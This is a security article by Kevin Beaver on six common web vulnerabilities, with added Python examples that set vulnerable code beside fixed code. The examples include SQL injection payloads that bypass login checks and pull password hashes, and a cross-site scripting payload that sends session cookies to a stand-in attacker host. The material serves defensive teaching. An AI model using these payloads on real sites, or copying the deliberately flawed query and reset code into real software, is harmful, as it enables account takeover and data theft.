Common website vulnerabilities you must defend against

This article is the fourth in a series about digital business security from information security consultant Kevin Beaver.
Websites and web applications are arguably the most exposed part of any network, and they are a prime target for exploitation. Whether they are hosted internally or in the cloud, web systems typically serve critical functions and hold sensitive information that your business likely can't afford to have compromised. It doesn't matter whether your websites or applications are developed in-house or by external parties: they all have the potential for security flaws that criminal hackers and others can turn into ill-gotten gains.

There are literally hundreds of different web security exploits, but most of them are predictable, and many websites and applications are vulnerable to them at some point in their lifecycle. The following are common web weaknesses that you must find and properly defend against:

1. SQL injection

This is an input validation flaw that lets an attacker inject SQL commands through vulnerable web pages and input parameters, so that the database runs statements the developer never intended. The outcome ranges from reading or modifying data the attacker should never see to, on poorly configured database servers, direct operating system access.
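
The flaw and its fix side by side, as an added example that is not from the original article. It uses Python's built-in sqlite3 module with a constructed in-memory users table (an assumption for the demo); the vulnerable lookup concatenates the request parameter into the SQL string, the safe one binds it as a parameter, and two classic payloads show the difference.

```python
import sqlite3

# Constructed in-memory database standing in for a real back end. The users
# table and its rows are assumptions for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                     [("alice", "hash-a"), ("bob", "hash-b")])
    return conn

def find_user_vulnerable(conn, username):
    # The request parameter is concatenated into the statement, so the
    # attacker gets to write part of the SQL.
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def find_user_safe(conn, username):
    # Parameterised query: the value is bound separately and is never parsed
    # as SQL, whatever characters it contains.
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

# Two classic payloads: the first makes the WHERE clause always true, the
# second appends a query that pulls a column the page was never meant to show.
PAYLOAD_BYPASS = "x' OR '1'='1"
PAYLOAD_UNION = "x' UNION SELECT id, password_hash FROM users WHERE '1'='1"

if __name__ == "__main__":
    conn = build_db()
    print(find_user_vulnerable(conn, PAYLOAD_BYPASS))  # every user
    print(find_user_vulnerable(conn, PAYLOAD_UNION))   # password hashes instead of names
    print(find_user_safe(conn, PAYLOAD_BYPASS))        # [] : no user is literally named that
    print(find_user_safe(conn, PAYLOAD_UNION))         # []
```

Parameterised queries (or an ORM that produces them) are the fix; escaping input by hand is error-prone and does not cover numeric or identifier positions. Running the application's database account with the minimum privileges it needs limits what a successful injection can reach.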

2. Cross-site scripting

A related flaw in input handling and output encoding: untrusted data is written into a page without being encoded, so an attacker's script runs inside other users' browsers. That script can hijack the user's session, read sensitive information displayed in the browser, or send the victim to a site that spreads malware.
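
An added example, not code from the original article, showing the same user-supplied value echoed into two constructed templates (page body and attribute value, both assumptions for the demo) with and without output encoding. The two payloads are constructed; the checks only illustrate whether the injected markup survives.

```python
import html
import re

# Constructed templates standing in for two spots where a site echoes user
# input: the page body and a double-quoted attribute value.
BODY_TEMPLATE = "<p>Results for: {term}</p>"
ATTR_TEMPLATE = '<input type="text" name="q" value="{term}">'

def render_body_vulnerable(term):
    # Raw interpolation: whatever the user typed becomes part of the markup.
    return BODY_TEMPLATE.format(term=term)

def render_body_safe(term):
    # html.escape turns < > & " ' into entities, so the browser shows the
    # payload as text instead of parsing it as markup.
    return BODY_TEMPLATE.format(term=html.escape(term, quote=True))

def render_attr_vulnerable(term):
    return ATTR_TEMPLATE.format(term=term)

def render_attr_safe(term):
    # The same encoding is sufficient inside a double-quoted attribute
    # because the quote character itself is encoded as &quot;.
    return ATTR_TEMPLATE.format(term=html.escape(term, quote=True))

def has_script_tag(page):
    return re.search(r"<script\b", page, re.IGNORECASE) is not None

def has_event_handler(page):
    # Detects an injected attribute such as onfocus=" in the rendered page.
    return re.search(r'\son[a-z]+="', page, re.IGNORECASE) is not None

# Constructed payloads: cookie theft via a script tag, and code execution by
# breaking out of the attribute value.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'

if __name__ == "__main__":
    print(render_body_vulnerable(SCRIPT_PAYLOAD))
    print(render_body_safe(SCRIPT_PAYLOAD))
    print(render_attr_vulnerable(ATTR_PAYLOAD))
    print(render_attr_safe(ATTR_PAYLOAD))
```

Encoding must match the context: html.escape is right for HTML text and quoted attributes, but a value placed inside a script block, a URL or a CSS rule needs that context's own encoder, and modern template engines do this automatically when auto-escaping is left on. Marking session cookies HttpOnly and deploying a Content Security Policy limit the damage when an encoding gap is missed.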

3. Weak authentication methods

These are flaws that let attackers run automated password-guessing tools against the login, log in with credentials stolen from other websites (credential stuffing), or otherwise manipulate the login to gain unauthorised access to the system or to sensitive parts of it. They are made worse by the absence of controls that slow down automated attempts, such as account lockout, rate limiting and CAPTCHAs that require users to enter random characters in order to log in.
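
An added example, not from the original article, of a login routine with the controls the paragraph describes: salted, slow password hashing, a constant-time comparison, the same amount of work for unknown accounts, and a per-account failure window that locks the account after too many wrong guesses. The user store, thresholds and injectable clock are assumptions made so the code runs stand-alone.

```python
import hashlib
import hmac
import secrets
import time

def hash_password(password, salt=None, iterations=100_000):
    # Salted PBKDF2-HMAC-SHA256. The iteration count is kept modest so the
    # example runs quickly (assumption: raise it, or use Argon2/bcrypt, in production).
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest

class LoginGate:
    """Password login with per-account failure counting and lockout."""

    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.time):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self.users = {}     # username -> (salt, iterations, digest)
        self.failures = {}  # username -> (count, time of first failure in the window)

    def add_user(self, username, password):
        self.users[username] = hash_password(password)

    def _failure_state(self, username):
        # Failures are counted within a window that starts at the first failure;
        # reaching the limit locks the account for the rest of that window.
        count, since = self.failures.get(username, (0, None))
        if since is not None and self.clock() - since >= self.lockout_seconds:
            return 0, None   # window over: start counting afresh
        return count, since

    def locked(self, username):
        count, _ = self._failure_state(username)
        return count >= self.max_failures

    def login(self, username, password):
        if self.locked(username):
            return "locked"
        record = self.users.get(username)
        if record is None:
            hash_password(password)   # same work for unknown users: no timing oracle
            ok = False
        else:
            salt, iterations, digest = record
            ok = hmac.compare_digest(hash_password(password, salt, iterations)[2], digest)
        if ok:
            self.failures.pop(username, None)
            return "ok"
        count, since = self._failure_state(username)
        self.failures[username] = (count + 1, since if since is not None else self.clock())
        return "denied"

if __name__ == "__main__":
    gate = LoginGate(max_failures=3, lockout_seconds=60)
    gate.add_user("alice", "correct horse battery staple")
    print([gate.login("alice", "wrong") for _ in range(3)])   # denied, denied, denied
    print(gate.login("alice", "correct horse battery staple"))  # locked
```

Per-account lockout stops online guessing of one password but not credential stuffing, where each account sees only one or two attempts; that needs per-source and global rate limiting, checks against known-breached passwords, and multifactor authentication. The "locked" result is returned here for clarity; to the client a real deployment should return the same generic failure message and record the distinction only in server-side logs.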

4. Poor user session management

These are flaws that allow an attacker to take over a legitimate user's login session, for example through session identifiers that are guessable, exposed in URLs or never expired, and thereby gain that user's access to the system.
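
An added example, not from the original article, of a server-side session store with the properties that prevent the takeovers described above: unguessable identifiers from the OS random source, idle expiry, server-side invalidation on logout, rotation of the identifier at login so a pre-planted identifier (session fixation) never becomes an authenticated session, and cookie flags that keep the identifier off the wire and away from page scripts. The timeouts and injectable clock are assumptions for the demo.

```python
import secrets
import time

class SessionStore:
    """Server-side session store: opaque random IDs, idle expiry, rotation on login."""

    def __init__(self, idle_timeout=1800, clock=time.time):
        self.idle_timeout = idle_timeout
        self.clock = clock
        self.sessions = {}  # session id -> {"user": name or None, "last_seen": timestamp}

    def _new_id(self):
        # 256 bits from the OS CSPRNG: neither guessable nor sequential.
        return secrets.token_urlsafe(32)

    def create(self):
        sid = self._new_id()
        self.sessions[sid] = {"user": None, "last_seen": self.clock()}
        return sid

    def lookup(self, sid):
        """Return the session for sid, or None if it is unknown or has been idle too long."""
        session = self.sessions.get(sid)
        if session is None:
            return None
        if self.clock() - session["last_seen"] > self.idle_timeout:
            del self.sessions[sid]
            return None
        session["last_seen"] = self.clock()
        return session

    def login(self, sid, user):
        """Authenticate and rotate the ID, so an ID known before login is worthless afterwards."""
        self.sessions.pop(sid, None)
        new_sid = self._new_id()
        self.sessions[new_sid] = {"user": user, "last_seen": self.clock()}
        return new_sid

    def logout(self, sid):
        # Invalidate server side; clearing the cookie alone would leave the session usable.
        self.sessions.pop(sid, None)

def session_cookie(sid):
    # Secure: sent over HTTPS only. HttpOnly: hidden from page scripts. SameSite: limits CSRF.
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"

if __name__ == "__main__":
    store = SessionStore()
    planted = store.create()              # an ID an attacker could have obtained pre-login
    authed = store.login(planted, "alice")
    print(store.lookup(planted))          # None: the planted ID died at login
    print(store.lookup(authed)["user"])   # alice
    print(session_cookie(authed))
```

The identifier should never appear in a URL, where it ends up in logs, browser history and Referer headers, and sessions should also be rotated after any other privilege change (such as a password change) and capped with an absolute lifetime in addition to the idle timeout.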

5. Weak password reset function

This is a logic flaw in the password reset feature that can be used to trick the system into resetting a legitimate user's password without properly verifying that the person requesting the reset is that user.
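
An added example, not from the original article, contrasting the flawed reset (a known username is enough to replace the password) with a token-based flow: the reset token is random, stored only as a hash, time-limited, single use and compared in constant time, and an unknown username gets the same response so the feature cannot be used to enumerate accounts. The user store (SHA-256 of the password, an assumption made to keep the example short; a real store uses a slow hash) and the injectable clock are assumptions.

```python
import hashlib
import hmac
import secrets
import time

class PasswordReset:
    def __init__(self, ttl=900, clock=time.time):
        self.ttl = ttl
        self.clock = clock
        self.password_hashes = {}  # username -> sha256 of password (assumption: slow hash in production)
        self.pending = {}          # username -> (sha256 of reset token, expiry time)

    @staticmethod
    def _digest(value):
        return hashlib.sha256(value.encode()).digest()

    def add_user(self, username, password):
        self.password_hashes[username] = self._digest(password)

    def check_password(self, username, password):
        stored = self.password_hashes.get(username)
        return stored is not None and hmac.compare_digest(stored, self._digest(password))

    def reset_vulnerable(self, username, new_password):
        # The logic flaw: knowing a username is all it takes to replace its password.
        if username in self.password_hashes:
            self.password_hashes[username] = self._digest(new_password)
            return True
        return False

    def request_reset(self, username):
        # Returns the token that would be e-mailed to the address on file. Only its
        # hash is stored, so a database leak does not hand out live tokens. An unknown
        # username still gets a token-shaped response, so accounts cannot be enumerated.
        token = secrets.token_urlsafe(32)
        if username in self.password_hashes:
            self.pending[username] = (self._digest(token), self.clock() + self.ttl)
        return token

    def complete_reset(self, username, token, new_password):
        entry = self.pending.get(username)
        if entry is None:
            return False
        token_hash, expires_at = entry
        if self.clock() > expires_at:
            del self.pending[username]
            return False
        if not hmac.compare_digest(self._digest(token), token_hash):
            return False
        del self.pending[username]   # single use: a token is consumed whether or not it leaks later
        self.password_hashes[username] = self._digest(new_password)
        return True

if __name__ == "__main__":
    pr = PasswordReset()
    pr.add_user("alice", "original")
    print(pr.reset_vulnerable("alice", "attacker-chosen"))        # True: no verification at all
    token = pr.request_reset("alice")                             # would go out by e-mail
    print(pr.complete_reset("alice", "not-the-token", "x"))       # False
    print(pr.complete_reset("alice", token, "new-secret"))        # True
    print(pr.complete_reset("alice", token, "again"))             # False: already used
```

Completing a reset should also invalidate the account's existing sessions and notify the user; "security questions" whose answers are public or guessable do not count as verification.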

6. Server misconfigurations

These are flaws such as insecure web server configurations and missing software patches that allow remote exploitation, covering everything from obtaining a command prompt on the system to causing a denial of service.


Every web environment is unique

These vulnerabilities are made worse by the fact that every web environment is unique. From developers to IT operations staff to security analysts, many people are involved. Given the complexity of the code as well as the underlying server and network infrastructure, web security concerns can make up a significant part of your overall security risk. Bring the human element into the equation and there's a lot going on – and a lot to lose.

The important thing is to acknowledge these issues and then take reasonable steps to do something about them. The process goes as follows:

·    Know your environment, including all web systems associated with processing or storing sensitive business information.

·    Understand how it’s all at risk by performing proper vulnerability and penetration testing, source code analyses, and ensuring security is ingrained into your development and quality assurance processes.

·    Do something about the security issues identified by resolving known vulnerabilities and also applying compensating controls such as web application firewalls and multifactor authentication where necessary.

The secret to web security success is continual improvement. It won’t happen all at once or even in the near term. However, proper security practiced consistently over time by all those involved – both technical staff and management – will ensure that web security risks are properly mitigated long term.

About the author

Kevin Beaver, CISSP is an information security consultant, writer, and professional speaker with Atlanta, GA-based Principle Logic, LLC. With over 31 years in IT and 25 years in security, Kevin specializes in independent security assessments and virtual CISO consulting work to help businesses uncheck the boxes that keep creating a false sense of security. He has written 12 books on security including the best-selling Hacking For Dummies and The Practical Guide to HIPAA Privacy and Security Compliance. Kevin has written over 1,000 articles on security and regularly contributes to TechTarget's SearchSecurity.com, Ziff Davis' Toolbox.com, and Iron Mountain’s InfoGoTo.com. He has a bachelor’s in Computer Engineering Technology from Southern College of Technology and a master’s in Management of Technology from Georgia Tech. In his free time, Kevin races cars in the SCCA Spec Miata class and enjoys riding dirt bikes and snow skiing.
© PSA Insurance Solutions,
PSA Insurance Solutions Ltd Reg No: C83206 is a limited liability company under Maltese Law, having its registered address at: MIB building 53 Abate Rigord Street Ta’ Xbiex Malta, Tel + 356 22 58 34 92. The company is enrolled to act as an insurance agent in terms of the Insurance Intermediaries Act, 2006 by the Malta Financial Services Authority (MFSA), Notabile Road, Attard BKR 3000, Malta.